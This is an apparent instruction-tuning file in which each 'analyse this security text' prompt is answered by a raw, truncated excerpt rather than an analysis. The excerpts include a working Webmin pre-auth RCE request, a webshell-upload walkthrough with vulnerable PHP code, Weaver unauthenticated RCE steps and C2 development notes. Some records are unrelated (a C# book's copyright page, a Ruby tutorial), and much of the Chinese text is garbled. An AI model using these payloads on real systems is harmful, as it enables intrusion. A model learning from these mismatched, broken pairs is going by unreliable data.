{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Webmin Pre-Auth Remote Code Execution (CVE-2019-15107) [中文版本(Chinese version)](README.zh-cn.md) Webmin is a web-based system configuration tool for Unix-like systems. The vulnerability exists in the password reset page, which allows unauthenticated users to execute arbitrary commands through a simple POST request. Referrers: - https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html - https://www.exploit-db.com/exploits/47230 - https://blog.firosolutions.com/exploits/webmin/ ## Start Vulnerability Application Start a vulnerable Webmin 1.910 through following command: ``` docker compose up -d ``` After the environment is started, you can see the login page of Webmin at `https://your-ip:10000`. ## Vulnerability Reproduce The payload of the reference links is incomplete. After reading the code in depth, I found that command can be executed only if the user parameter of the body doesn't exist before 1.920, upon 1.920, no limit. In short, sending a following POST request to execute command `id`: ``` POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60 user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2 ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我从SharpC2 上的学到的东西 Perface 在这里非常感谢 @RastaMouse 师傅开发的这款.NET C2,去年刚开始看的时候他的视频教程对我 帮助很大期间作者也重构过代码到现在还是很喜欢最新的 Experimental版代码 实话说这是我 从SharpSploit项目以来读到的第二份令人舒服的代码了3端分离式设计让我也慢慢培养自己如 何展现写代码前思路上的体现让阅读代码的人非常舒服这是我今后追求的目标 今天对SharpC2学习做个收尾(为什么要收尾呢,后面会提到)不知道大家怎么看这款开源.NET C2我是非常喜欢的对待新手非常友好好了 言归正传 主要要分享3个点: 1. SharpC2 Experimental 版 bug修复以及各种踩坑 2. SharpC2 不足的地方 对待个人来说可以改进的地方 3. 简单总结下使用体会 1. 无法上线bug修复 1.1 Perface 参考: https://twitter.com/bopin2020/status/1398693022074695682 1.2 解决办法 这个问题是因为 .NET DataContractJsonSerializer 对DateTime UTC序列化时导致溢出发生的 参考: https://www.cnblogs.com/known/p/8735413.html Bug代码位置: Shared\\Utilities\\Utilities.cs 添加对日期格式的修改, 原项目是 .NET Core 3.1的需要修改为 .NET 5.0 因为 DataContractJsonSerializerSettings 该类在.NET 5.0才有 参考: https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.json.dataco ntractjsonserializersettings?view=net-5.0 .NET 自带的Json序列化类 在.NET 5进行了质的提升 1.3 如何分析问题的 由于上面我们将Shared修改为 .NET 5.0,因此 StagerHTTP 就不能使用 .NET Framework 4.0为 了兼容我在测试时改为了4.8. 首先Beacon是怎么上线的SharpC2采用Stager 方式TeamServer在启动时会加载资源文件 然后控制端连接后创建监听器生成Stager后运行Stager远程拉去Stage.dll 这是真正的 beacon 这里画了个简单的图: 通过对比CSmsf上线 RDI 加载dll上线.NET 使用了自带的内存加载 代码参考: 跟进 Stage 核心方法 Agent.Stage.HttpEntry() 方法 这里加载 ConfigController 配置控制器后 实例化HttpCommModle类调用Execute方法 加载加密控制器Agent控制器后开始注册Beacon 功能模块调用Start执行 每一个模块配置了不同的命令分门别类非常清晰 也很适合扩展有兴趣的朋友可以读下代码 有朋友可能注意到了代码中我手动添加了很多提示语句主要为了排错到这里beacon还没有任 何问题跟进agent.Start() 发送源数据然后循环接收数据 继续跟进发现是 SerialiseData 序列化数据出现问题设置异常捕获发现问题然后就寻找答案 2. LastSeen 总是显示负数 这是个小问题 找到 计算时间差函数 修改 var diff = (DateTime.Now - LastSeen).TotalSeconds; 3. Others 其他bug, 发现控制端,beacon端过多时执行命令无回显通讯流量还有优化的空间 某些小问题: Beacon UI上remove后再也不会上线了当beacon checkin时做个判断如果UI上没有就添加即 可 监听器不会驻留每次启动TS都得创建监听器需要添加缓存机制参考CobaltStrike. load-module 加载模块beacon注册模块后 beacon console输入help 并无对应的命令帮助信 息需要添加 beacon console有数据回来时默认不会滚到ScrollToEnd() 关于WPF UI上的改进原作者基本上使用了标准的控件如果这些不能满足于你的需求也可以使 用WPF toolkit扩展控件 关于这部分具体参考作者的 Project/To do https://github.com/SharpC2/SharpC2/projects/1 beacon console Tab 自动补全 Nested child agents grid view C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nChurch of WiFi Wireless Extravaganza Todays Brethren: Thorn theprez98 Renderman Who Are The CoWF? Q: Pirates? Ninjas? Pirates with stealthy Ninja skills? Ninjas who say \"Arrgh\"? A #1: A Church where they do WiFi Voodoo Who Are The CoWF? A #2: A bunch of Monkeys who wear Pope hats The Problem The Problem  No skillz!  You know, like nunchuck skills, bowhunting skills, computer hacking skills... Girls only want boyfriends who have great skills. The Idea Learn + Touch = DO! I care about demonstrating and inciting 'hacker attitude' toward my fellow attendees... -c0nverge The Concept  Things we liked: Hands-on at Lockpick Village & LosTs informal breakout  Provide an area for wireless tutorials, mini- presentations and breakout sessions  Act as an introduction to the various wireless contests Learn + Touch = DO! The Solution: Skybox 209 Wireless Village: Breakouts  Breakout sessions are for any RF/Network subject  PSP Wireless Hacking (Squidly1)  RF Direction Finding (Renderman)  RFID (Thorn)  Even more! (WEP Cracking, WPA Cracking) Learn + Touch = DO! Learn + Touch = DO! Provide an open environment for learning of wireless network technologies  Contests and tutorials: all skill levels from beginner to expert  Breakout sessions: to introduce people to the wireless contests  Mini-presentations and demonstrations: provide an venue for wireless speakers to follow-up their presentations with hands-on demos, classes, etc. Skybox 209 DC Wireless Contests  Integrated to the Village  Allows people to learn a skill at the Village and then compete. Learn + Touch = DO! WPA-PSK Rainbow Tables  Same idea as LM or other Rainbow tables: Time vs. Computing power tradeoff  2006: 172,000 word dictionary x 1,000 most common SSIDs = 7 gig tables WPA-PSK Rainbow Tables This year: 1,000,000 password dictionary x 1,000 most common SSIDs = 35GB YIKES! CoWF Distro  USB-bootable full-Linux distro on a 100GB+ 3.5 HD (BackTrack 2 based)  Boot off any laptop/PC, and run wireless security checks at wi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n业务漏洞挖掘 案例与思考分享 微博安全高级工程师 唐茂凡 现状 01 01 现状 分类 常 规 注入XSSXXECSRFSSRF文件包含命令执行 URL重定向点击劫持等 其 他 网络层漏洞系统层漏洞 组件套件中间件漏洞等 业 务 登录认证业务办理业务数据业务流 程逻辑业务授权访问业务接口调用验 证码输入\\输出回退密码找回密码 重置实名认证设置个人信息绑定银行 卡红包优惠券订单CURD充值支付 提现...... 01 现状 不同 01 04 02 03 漏洞成因 复杂度 场景流 程变化 多端 通用性 风险点 隐蔽 不 同 01 现状 为什么业务安全越来越受重视 业务安全 越来越被重视 风险 02 02 风险 怎么做 03 03 怎么做 1  缺 乏 成 熟 的 标 准  工 具  服 务 2  信 息 不 对 称 3  外 部 力 量 有 限 4  各 种 难  难 以 接 触 业 务 环 境 难 以 触 发 业 务 场 景 难 以 理 解 业 务 原 理 和 风 险 . . . . . . 03 怎么做 企业不同时期业务与安全的关系 前期 中期 后期 1以业务需求为主注重功能实 现 2业务方安全意识薄弱 3基础安全为主不够重视业务 安全 4风险未集中暴露不能有效止 损 5事前缺乏安全评审与安全测试 6事中缺乏安全监控与风控运营 7事后缺乏支持难以溯源 缺乏必要的安全评估与测试 只对主要业务进行渗透测试代码 审计 被动事后响应 基于漏洞类型的自动化扫描检测 辅以人工测试传统类型的漏洞为 主 1除功能性能稳定性安全 成为业务的一个属性 2业务方安全意识提高 3业务安全基础建设业务安全 价值体现安全话语权提高 4风险集中暴露事件经验迅速 积累 5防护监控设备 6网络层系统层组件套件层 漏洞难以利用 7攻击者目标更多转向业务逻辑 层 切入到业务需求评审 业务设计 基于业务场景的安全测试以业务 场景流程为重心人工测试主导 +自动化漏洞发现 深入了解业务特点和安全需求根 据业务系统架构从前/后视角 业务视角与支撑系统视角划分测试 对象结合所有信息获取和评估手 段控制风险 1业务安全标准化作业 2业务安全决策影响 3业务安全咨询支持创新业务 发展 4基于业务安全体系建设保障 业务持续增长从止损思维到盈利 思维转化 5业务安全能力对外输出 03 怎么做 重视业务漏洞+ 较为完善的漏洞发现能力 02 03 04 05 06 01 线上业务被动扫描 SDL阶段黑白盒扫描 安全巡检 SRC等外部反馈 以业务场景流程为重心 人工挖掘漏洞 风控运营 03 怎么做 不同的业务场景 业 务 场 景 不 同 行 业 业 务 场 景 有 所 不 同 安 全 评 审 高 风 险 业 务 场 景 识 别 相 同 行 业  业 务 场 景 也 不 是 一 成 不 变 03 怎么做 安全测试人员需要哪些能力 03 怎么做 真正理解业务 01 02 03 04 体会&经验&思考 04 04体会&经验&思考 安全 产品 程序员 天敌 01 安全意识 培训 02 03 04 安全开发 红线 安全编码 规范 协助解决 问题 04体会&经验&思考", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRe-establishing Trust in Compromised Systems: Recovering from Rootkits that Trojan the System Call Table Julian B. Grizzard, John G. Levine, and Henry L. Owen {grizzard, levine, owen}@ece.gatech.edu School of Electrical and Computer Engineering Georgia Institute of Technology Atlanta, Georgia 303320250, USA Abstract. We introduce the notion of re-establishing trust in compro- mised systems, specifically looking at recovering from kernel-level root- kits. An attacker that has compromised a system will often install a set of tools, known as a rootkit, which will break trust in the system as well as serve the attacker with other functionalities. One type of rootkit is a kernel-level rootkit, which will patch running kernel code with untrusted kernel code. Specifically, current kernel-level rootkits replace trusted sys- tem calls with trojaned system calls. Our approach to recover from these type of rootkits is to extract the system call table from a known-good kernel image and reinstall the system call table into the running ker- nel. Building on our approach to current generation rootkits, we discuss future generation rootkits and address how to recover from them. 1 Introduction Modern computer systems are vulnerable to a wide variety of attacks. As attack- ers develop methods to exploit these vulnerabilities, a large number of systems are compromised. Compromises are costly to individuals, companies, govern- ments, and other organizations in terms of data breach, downtime, adminis- tration, and recovery. The number of new vulnerabilities discovered each year is growing, and as such we believe system compromises will continue to be a problem for the foreseeable future. Much work has been done on preventing and detecting system compromises; however, system compromises continue to be a problem. To date we have seen little work done in terms of methods for recovering from system compromises. Conventional wisdom states that one should wipe the system clean, reinstall, and p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# so 介绍 ## 基本介绍 - 为什么会用到 Shared Object(SO) - 开发效率 - 快速移植 - so 的版本 - 根据 CPU 平台有所不一样 ## 加载方法 - System.loadLibrary - 如果加载的文件名是 xxx 那么其实加载的是项目中 libs 目录下的 libxxx.so文件 - System.load - 对应 lib 的绝对路径 主要使用第一种方式第二种方式主要用于在插件中加载 so 文件 ## loadLibrary 加载流程 根据官方 API 介绍 > The call `System.loadLibrary(name)` is effectively equivalent to the call > > > ``` > > Runtime.getRuntime().loadLibrary(name) > > ``` 可以看出该函数其实调用的是 Runtime.java `libcore/luni/src/main/java/java/lang/Runtime.java` 中的函数 loadLibrary继而会继续调用 loadLibrary 另一个重载函数它包含两个参数 - libame我们传入的库名字 - VMStack.getCallingClassLoader()类加载器 ClassLoader方便于去寻找相应的 library ```java /** * Loads and links the library with the specified name. The mapping of the * specified library name to the full path for loading the library is * implementation-dependent. * * @param libName * the name of the library to load. * @throws UnsatisfiedLinkError * if the library can not be loaded. */ public void loadLibrary(String libName) { loadLibrary(libName, VMStack.getCallingClassLoader()); } /* * Searches for a library, then loads and links it without security checks. */ void loadLibrary(String libraryName, ClassLoader loader) { if (loader != null) { String filename = loader.findLibrary(libraryName); if (filename == null) { throw new UnsatisfiedLinkError(\"Couldn't load \" + libraryName + \" from loader \" + loader + \": findLibrary returned null\"); } String error = doLoad(filename, loader); if (error != null) { throw new UnsatisfiedLinkError(error); } return; } String filename = System.mapLibraryName(libraryName); List<String> candidates = new ArrayList<String>(); String lastError = null; for (String directory : mLibPaths) { String candidate = directory + filename; candidates.add(candidate); if (IoUtils.canOpenReadOnly(candidate)) { String error = doLoad(candidate, loader); if (error == null) { return; // We successfully loaded the library. Job done. } lastError = error; } } if (lastError != null) { throw new UnsatisfiedLinkError(lastError); } throw new UnsatisfiedL", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDownload from finelybook 7450911@qq.com 2 Microsoft Visual C# Step by Step Ninth Edition John Sharp Download from finelybook 7450911@qq.com 3 Microsoft Visual C# Step by Step, Ninth Edition Published with the authorization of Microsoft Corporation by: Pearson Education, Inc. Copyright  2018 by Pearson Education, Inc. All rights reserved. This publication is protected by copyright, and permission must be obtained from the publisher prior to any prohibited reproduction, storage in a retrieval system, or transmission in any form or by any means, electronic, mechanical, photocopying, recording, or likewise. For information regarding permissions, request forms, and the appropriate contacts within the Pearson Education Global Rights & Permissions Department, please visit www.pearsoned.com/permissions/. No patent liability is assumed with respect to the use of the information contained herein. Although every precaution has been taken in the preparation of this book, the publisher and author assume no responsibility for errors or omissions. Nor is any liability assumed for damages resulting from the use of the information contained herein. ISBN-13: 978-1-5093-0776-0 ISBN-10: 1-5093-0776-1 Library of Congress Control Number: 2018944197 1 18 Trademarks Microsoft and the trademarks listed at http://www.microsoft.com on the Trademarks webpage are trademarks of the Microsoft group of companies. All other marks are property of their respective owners. Warning and Disclaimer Every effort has been made to make this book as complete and as accurate as possible, but no warranty or fitness is implied. The information provided is on an as is basis. The author, the publisher, and Microsoft Corporation Download from finelybook 7450911@qq.com 4 shall have neither liability nor responsibility to any person or entity with respect to any loss or damages arising from the information contained in this book. Special Sales For information about buying this title in bulk quantities, or for specia", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI Hunt Penetration Testers! More Weaknesses in Tools and Procedures Wesley McGrew, Ph.D. Distributed Analytics and Security Institute Mississippi State University http://mcgrewsecurity.com @mcgrewsecurity wesley@mcgrewsecurity.com Introduction  Wesley McGrew  Distributed Analytics & Security Institute, Mississippi State University  Halberd Group  Vulnerabilities, Reverse Engineering, Forensics, Cyber Operations  @McGrewSecurity wesley@mcgrewsecurity.com What were talking about today  Operational Security for Penetration Testers (whilst trying to not rip off The Grugq)  Communication and Data Security Issues (not just bugs)  Illustrating and Classifying Risks Posed by Your Tools  Recommendations  For penetration testers and those who hunt them Previously Previously Previously @IHuntPineapples Awareness/Understanding of Risk/Vulnerabilities Value of Pen Testing Data Counter-Intuitive  Penetration testers, presumed experts of offense, largely arent mindful of their own security.  Reasons  Training - Classes, books, certifications  Toolchain maturity  Lack of documented incidents When we lack the capability to understand our tools, we operate at the mercy of those that do. Assumptions Regarding Realistic Attacks  An attacker may operate with sophistication, skill, and resources that exceed that of the targeted pentester  (Maybe this work can repair the imbalance)  May be positioned physically/network-wise convenient for interception and modification of traffic  MiTM may not be feasible for general skiddie schemes, but makes sense in this context Goals  Victimology: Is the ultimate target  The penetration tester?  Firm information used for fraud  Sabotage  Embarrassing leak (zf0-esque)  The client(s)?  Sensitive information  Vulnerabilities  Persistence Why this is attractive  Penetration tester exist outside of the clients culture/structure  yet wind up with extensive access  break technical/policy measures, by definition  already ought to look like good attackers, why ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 前 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660 0x02 资产收集到脆弱系统 在某src挖掘过程中本通过ssl证书对域名资产进了收集通过计算域名对应ip段的权重 整理出其C段资产进了批量录扫描 查看录扫描结果后发现了个有趣的件 http://36...*/upload_image.php 对于这种毫疑问要对参数进FUZZ 0x03 FUZZ参数+表单上传 使arjun具对其参数进fuzz发现了个参数字段为do 随后在burpsuite中对do的参数值进fuzz 成功fuzz出个do的参数值upload 构造url http://36...*/upload_image.php?do=upload成功出现上传表单 webshell名skr_anti.php 选择我们的webshell直接上传 上传后fuzz上传路径 赶上双倍活动8000块钱到 0x04 总结 我说这个漏洞有就家应该没意吧 综合来说学习思路点如下 1.遇到空敏感/apiFUZZ参数和参数值 2.上传没返回路径不要慌聪明的脑去FUZZ http://36.*.*.*/upload --------> 403 继续fuzz http://36.*.*.*/upload/images --------> 403 构造url http://36.*.*.*/upload/images/skr_anti.php 3.SRC测试的时候不要上传webshell传phpinfo就不然会被降赏我就是吃了哑巴亏第次遇着不 让传webshell的 4.资产收集是红队还有渗透测试的核", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n企业应用层面临的IT安全风险与危机 何迪生 Dixon Ho OWASP AppSec Asia 2016 今天分享的内容 What we will share today !!!  安全领域的未来 What Security Domain will look Like in the Future  当前面临的最大挑战 Review of todays Security Challenge  下一步应该做什么 What should we do immediately/next step? 安全领域未来的世界是什么样. Lets discuss about what the Security Domain will look like in the future 问题: 大家有没有思考过未来的安全体系会是什么样? Question: Have you think about what will be the Security System in the future  安全领域的未来 The future Security Realm !!! 公元2016年3月 围棋 人机大战历史性对 决李世石败给机 器人 AlphaGo AD March 2016 Historic Battle\" Go Man-Machine Battle results were announced: AlphaGO win a victory over Lee Sedol 公元2016年3月李世石在人机大战以 14 输给 了AlphaGo围棋机器人 In March 2016, Lee Sedol in Man-Machine War\" with result of 1 to 4 lost to AlphaGo Robots!  实际上随着2012年深度学习技术取得突破人工智能等相关技术开始被应用它不仅可以帮助我们造出各种聪明可爱的机器人还可以投入在许多 不同行业  Indeed, as the breakthrough of deep learning technology in 2012, Artificial Intelligence-related technology has begun to apply in many areas, its not only help us to create all kinds of clever, cute robots, these technologies are beginning to be applied in the field of many industries. 如此智能的AlphaGo机器人引发了人工智能会 不会超越人类的争论 AlphaGo let us know that robots can already so \"smart\" and even give rise to A.I. will surpass Human\" argument.  而比赛结束后AlphaGo凭借一场胜利分数增 加到3586排名也超越韩国朴永训日本井山 裕太而来到第二仅次于中国棋王柯洁(3621分)  After this Man-Machine war of the Century , AlphaGo obtains 3586 points, ranking above Park Jungwhan(Korea), Lyama Yuta (Japan) and came second only to the King of Go - Ke Jie from China (3621 points).  Google AlphaGo与李世石之间的人机世纪大战已经落下帷幕人工智能4:1取得 胜利而且因为终于输了一场AlphaGo也有了正式的WHR等级分数和排名 AlphaGo是故意输一场  占WHR排名 Does AlphaGo intentionally lose for an official WHR rankings?  Man-Machine war of the Century between Google AlphaGo and Lee Sedol has ended, resulting a AI 4: 1 victory, due to \"finally\" lost one game, AlphaGo has formally obtained the WHR rankings AlphaGo下一个对手是 The next opponent of AlphaGo is? 中国围棋第一人怎么能咽的下这口气吗 Can the King of Go in China may let go this", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 字符串类 --- - https://www.kancloud.cn/imxieke/ruby-base/107302 --- # 字符串的创建 最简单的字符创建方法就是把字符的集合用 `\" \"` 或者 `' '` 括起来并直接写到程序中 ```ruby str1 = \"这也是字符串\" str2 = ' 那也是字符串' ``` 使用 `\" \"` 时还可以执行用 `#{}` 括起来的 Ruby 式子并将执行结果嵌入到字符串中这个 `#{}` 就称为内嵌表达式embedded expressions ```ruby moji = \"字符串\" str1 = \"那也是#{moji}\" p str1 #=> \"那也是字符串\" str2 = ' 那也是#{moji}' p str2 #=> \"那也是\\#{moji}\" ``` 使用 `\" \"` 时可以显示使用 `\\`转义的特殊字符 使用 \\ 转义的特殊字符 特殊字符 | 意义 - | - \\t | 水平制表符0x09 \\n | 换行符0x0a \\r | 回车0x0d \\f | 换页0x0c \\b | 退格0x08 \\a | 响铃0x07 \\e | 溢出0x1b \\s | 空格0x20 \\v | 垂直制表符0x0b \\nnn | 8 进制表示方式n 为 0 7 \\Xnn | 16 进制表示方式n 为 0  9a  fA  F \\Cx\\C-x | Control + x\\M-x Meta(Alt) + x \\M-\\C-x | Meta(Alt) + Control + x \\x | 示 x 字符本身x 为除以上字符外的字符 \\Unnnn | Unicode 字符的 16 进制表示方式n 为 0  9a  fA  F 下面我们来看看不用 `\" \"``' '` 时应如何创建字符串 **使用 %Q 与 %q** 当创建包含 `\"` 或者 `'` 的字符串时比起使用 `\\\"``\\'` 进行转义使用 `%Q` 或者 `%q` 会更简单 ```ruby desc = %Q{Ruby 的字符串中也可以使用'' 和\"\"} str = %q|Ruby said, 'Hello world!'| ``` 使用 `%Q` 相当于用 `\" \"` 创建字符串使用 `%q` 则相当于用 `' '` 创建字符串 **使用 Here Document** Here Document 是源自于 Unix 的 shell 的一种程序写法使用 `<<` 来创建字符串创建包含换行的长字符串时用这个方法是最简单的 ```ruby <<\"结束标识符\" 字符串内容 结束标识符 ``` `<<` 后面的结束标识符可以用 `\" \"` 括着的字符串或者用 `' '` 括着的字符串来定义用 `\" \"` 括住的字符串中可以使用转义字符和内嵌表达式而用 `' '` 括住的字符串则不会做任何特殊处理只会原封不动地显示另外使用既没有 `\" \"` 也没有 `' '` 的字符串时则会被认为是用 `\" \"` 创建的字符串 由于 Here Document 整体就是字符串的字面量因此可以被赋值给变量也可以作为方法的参数 我们一般将 `EOF` 或者 `EOB` 作为结束标识符使用`EOF` 是End of File的简写`EOB` 是End of Block的简写 Here Document 的结束标识符一定要在行首因此在程序缩进比较深的地方使用 Here Document 的话有时就会像下面的例子那样出现整个缩进乱掉的情况 ```ruby 10.times do |i| 10.times do |j| print(<<\"EOB\") i: #{i} j: #{j} i*j = #{i*j} EOB end end ``` 若希望缩进整齐可以像下面那样用 `<<-` 代替 `<<`这样程序就会忽略结束标识符前的空格和制表符结束标识符也就没有必要一定要写在行首了 ```ruby 10.times do |i| 10.times do |j| print(<<-\"EOB\") i: #{i} j: #{j} i*j = #{i*j} EOB end end ``` 这样操作以后`print` 和 `EOB` 的缩进就会变得整齐便于阅读下面是将 Here Document 赋值给变量时的做法 ```ruby str = <<-EOB Hello! Hello! Hello! EOB ``` **使用 sprintf 方法** 就像用 8 进制或 16 进制的字符串来表示数值那样我们也可以用 `sprintf` 方法输出某种格式的字符串 **使用 ``** 通过用 ```ruby `命令` ``` 这样的形式我们可以得到命令的标准输出并将其转换为字符串对象下面是获取 L", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1. 前言 昨晚看到朋友圈推了个和裸聊诈骗斗智斗勇的视频点进去一看感觉和上个月搞得一个站的后台很像 所以想上去看一下结果网站关了就通过fofa重新搜了一个存活的网站发现确实很像 于是就有了这篇文章由于很多都是后补的图可能不是很完整见谅 2. 第一次shell 由于上次拿到目标的时候就给了一个域名所以先浏览一下看看常规的扫一下目录 发现存在 uploads , temp , tmp 这几个看起来很像上传文件的目录而且有 file.php 这个文件然后发 现扫出很多奇奇怪怪的东西猜测对应目录nginx应该是设置了php禁止执行 首页长这样 由于没有给我提供账号密码后面发现这个是后台登录给账号密码就有鬼了所以我先看扫出来 的路径有什么有价值的东西 我先进app目录看看进去之后长这样 好家伙赶紧主动一点下一步然后我发现我点哪都没反应将ua设置成手机的也不行用手机模拟器 的浏览器打开也没反应那就只能看看js有泄露啥敏感的接口吧然后看到js里面有申请手机的一些权 限然后有个文件上传的接口我想应该就是诈骗的诱导这些一时上头的人同意这些操作然后手机的 短信联系人视频照片等等敏感的东西都通过这个文件上传接口上传到对方服务器上了 2.1. 任意文件上传 有上传接口那就先测试上传毕竟如果没限制的话就直接拿下了 首先看到他上传文件的时候有三个参数文件手机号和邀请码我先尝试只上传文件不带其他参数,通 过burp构造上传包上传之后返回了一个success 这里我想到之前扫目录的时候扫了三个感觉像上传的目录出来但是上传之后的文件名也不知道我这 里就直接猜测他上传之后没有改文件名因为诈骗人员可能也要根据文件名判断文件是否存在可以利用 的信息然后尝试了几个目录发现我刚才上传的文件确实就在 /uploads/123.test 下面后面看 file.php的代码的时候发现其实上传之后是会改文件名的但是由于我没有提交另外两个参数所以我上 传的文件名就没有变代码23-24行 <?php require_once('common/Db.php'); require_once('common/Function.php'); $save_path = \"\"; if($_POST[\"save_path\"]){ $save_path = $_POST[\"save_path\"]; }else{ $save_path = \"./uploads/\".$_POST['sjh'].\"/\"; } if (!file_exists($save_path)) { mkdir($save_path); } $save_name = \"\"; if($_POST[\"save_name\"]){ $save_name = $_POST[\"save_name\"]; }else{ $save_name = basename($_FILES['uploadedfile']['name']); } $target_path = $save_path.$save_name; $result = move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path); if($result) { $sjh= $_POST['sjh']; $yqm= $_POST['yqm']; $r=Add('files','imei,imei2,addtime,file',\"'\".$sjh.\"','\".$yqm.\"','\".time().\" ','\".\"/uploads/\".$sjh.\"/\".$save_name.\"'\"); echo \"success\"; } else{ echo \"fail\"; } ?> 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 之后我尝试直接上传php文件上传返回的也是success我这时候就以为这个目标已经拿下了 结果对方通过nginx设置了uploads目录下的php文件禁止执行 2.2. 佛站 这时候我就想通过佛站找到同类型的站点批量上传一下试试看看有没有偷懒没配置禁止执行的网站 顺手扫了一波备份文件没扫到后面拿下shell的时候发现确实有备份不过名字是猜不出的那种 由于上传包很简单可以直接通过burp复制出curl command然后在服务器批量上传一下然后批量检测 一下上传之后是否可以执行 接下来就能直接getshell下载源码进行审计了最终发现通过添加save_name参数可以更改上传路径 下面上传包就可以将文件上传到http://xxxxx/app/123.php.最", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n##Xor with static key (Crypto, 500p) You are in this GAME. A critical mission, and you are surrounded by the beauties, ready to shed their slik gowns on your beck. On onside your feelings are pulling you apart and another side you are called by the duty. The biggiest question is seX OR success? The signals of subconcious mind are not clear, cryptic. You also have the message of heart which is clear and cryptic. You just need to use three of them and find whats the clear message of your Mind... What you must do? ###PL [ENG](#eng-version) Dostajemy 3 pliki: [plaintext 1](Heart_clear.txt), [ciphertext 1](Heart_crypt.txt), [ciphertext 2](Mind_crypt.txt) Na podstawie dwóch pierwszych plików należy ustalić algorytm szyfrowania a następnie zdekodować trzeci plik. Treść zadania sugeruje, że szyfrowanie to XOR. W związku z tym wyciągamy klucz szyfrowania korzystając a zależności: `Plaintext xor Key = Ciphertex` => `Paintext xor Ciphertext = Key` Zadanie rozwiązujemy prostym skryptem: ```python import codecs name = \"Heart_clear.txt\" name2 = \"Heart_crypt.txt\" with codecs.open(name) as input_file: with codecs.open(name2) as input_file2: data = input_file.read() data2 = input_file2.read() xor_key = [(ord(x)  ord(y)) for (x, y) in zip(data, data2)] print(xor_key) print(\"\".join([chr(x) for x in xor_key])) with codecs.open(\"Mind_crypt.txt\") as crypto: data = crypto.read() print(\"\".join(chr(xor_key[i]  ord(x)) for i, x in enumerate(data))) ``` Który daje nam klucz: `Its right there what you are looking for.` oraz link: https://play.google.com/store/apps/collection/promotion_3001629_watch_live_games?hl=en Nie bardzo wiedzieliśmy co dalej zrobić, ponieważ link nie był flagą. W końcu wpadliśmy na to żeby wysłać tytuł \"strony\" `Never Miss a Game` i to okazało sie flagą. ###ENG version We get 3 files: [plaintext 1](Heart_clear.txt), [ciphertext 1](Heart_crypt.txt), [ciphertext 2](Mind_crypt.txt) Using the first two we are supposed to figure out the algorithm and then decode the third fil", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n泛微审计小结 0x00:起因是群里周末发了一个 cnvd 收录泛微注入的截图然后找泛微要了一份补丁 发现漏洞位置在/upgrade/detail.jsp 登陆后的注入没啥卵子用遂自己扒了套代码自己审计 0x01:未授权的 sql 注入 漏洞位置:/clusterupgrade/getProcessInfo.jsp 跟进去 注入点发生在上图 408 行 实际测试中发现泛微全局的 filter黑盒绕的比较迷简单 fuzz 了下 得到了如 下 poc 这时候发现这个 poc 的字段位置只要填入非数字型字符union 就被转成乱码 这里实在不想再饶了留个坑 然后又碰到了另一个坑(mmp 的泛微) 我们可以通过联合查询控制图中 1 位置的的返回结果,然后把注入语句 hex 后写入 str10 拼 接给图中 2 位置的 sql 语句,构造注入取数据类似二次注入 但 不知道为毛给我返回了一个地址 0x02:SSRF SSRF 算是上面注入的一个延伸攻击面 通过联合查询控制返回值 httpaddress,达到 ssrf 的目的印象中高版本 jdk 好像不支持 gopher 和 dict 攻击面比较窄凑数的洞 0x03:未授权 rce 主要问题在/clusterupgrade/tokenCheck.jsp 这个文件 这里代码写的挺迷的红框的判断好像有没有区别不大 ecology2018_upgrade 值还是硬编码的 直接访问该文件 我们可以得到 license 加密后的值和 timestamp(String timestamp = des.getDistributeinfo();) 有了 license 之后 我们可以绕过 checkSecurity 函数 上传恶意文件 主要就是绕过 checkSecurity 函数后续上传就没啥好说了 直接看利用吧 1.拿到加密后的 key 2.构造 token 进行上传 3.触发解压缩操作 4.Getshell Ps.有的会有 ip 校验 加个 XFF 头 通用性不强水一发", "category": "text_analysis", "source": "security_papers"}
